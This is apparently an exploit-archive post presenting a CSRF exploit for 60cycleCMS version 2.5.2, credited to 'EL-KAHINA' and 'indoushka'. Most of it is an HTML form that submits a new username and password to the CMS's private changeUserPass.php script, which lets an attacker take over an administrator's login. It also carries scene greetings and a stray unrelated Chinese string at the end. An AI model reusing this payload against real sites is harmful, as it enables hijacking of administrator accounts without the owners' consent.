======================================================================================== | # Title: 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit | # Author : EL-KAHINA | # Home : www.iqs3cur1ty.com/vb | # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug: CSRF ======================Exploit By indoushka ================================= # Exploit: <html> <body> <h2>Change Username or Password</h2> <p>Enter desired username and password.</p> <form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass"> Desired Username: <input name="user" type="text" /><br /> Desired Password: <input name="pass" type="password"/><br /> Confirm Desired Password: <input name="passConfirm" type="password"/><br /> <input type="button" value="Submit" onclick="checkForm(this.form)" /> </form> </body> </html> ========================================== Greetz : Exploit-db Team all my friend :(Dz-Ghost Team ) im indoushka's sister ------------------------------------------
体验盒子
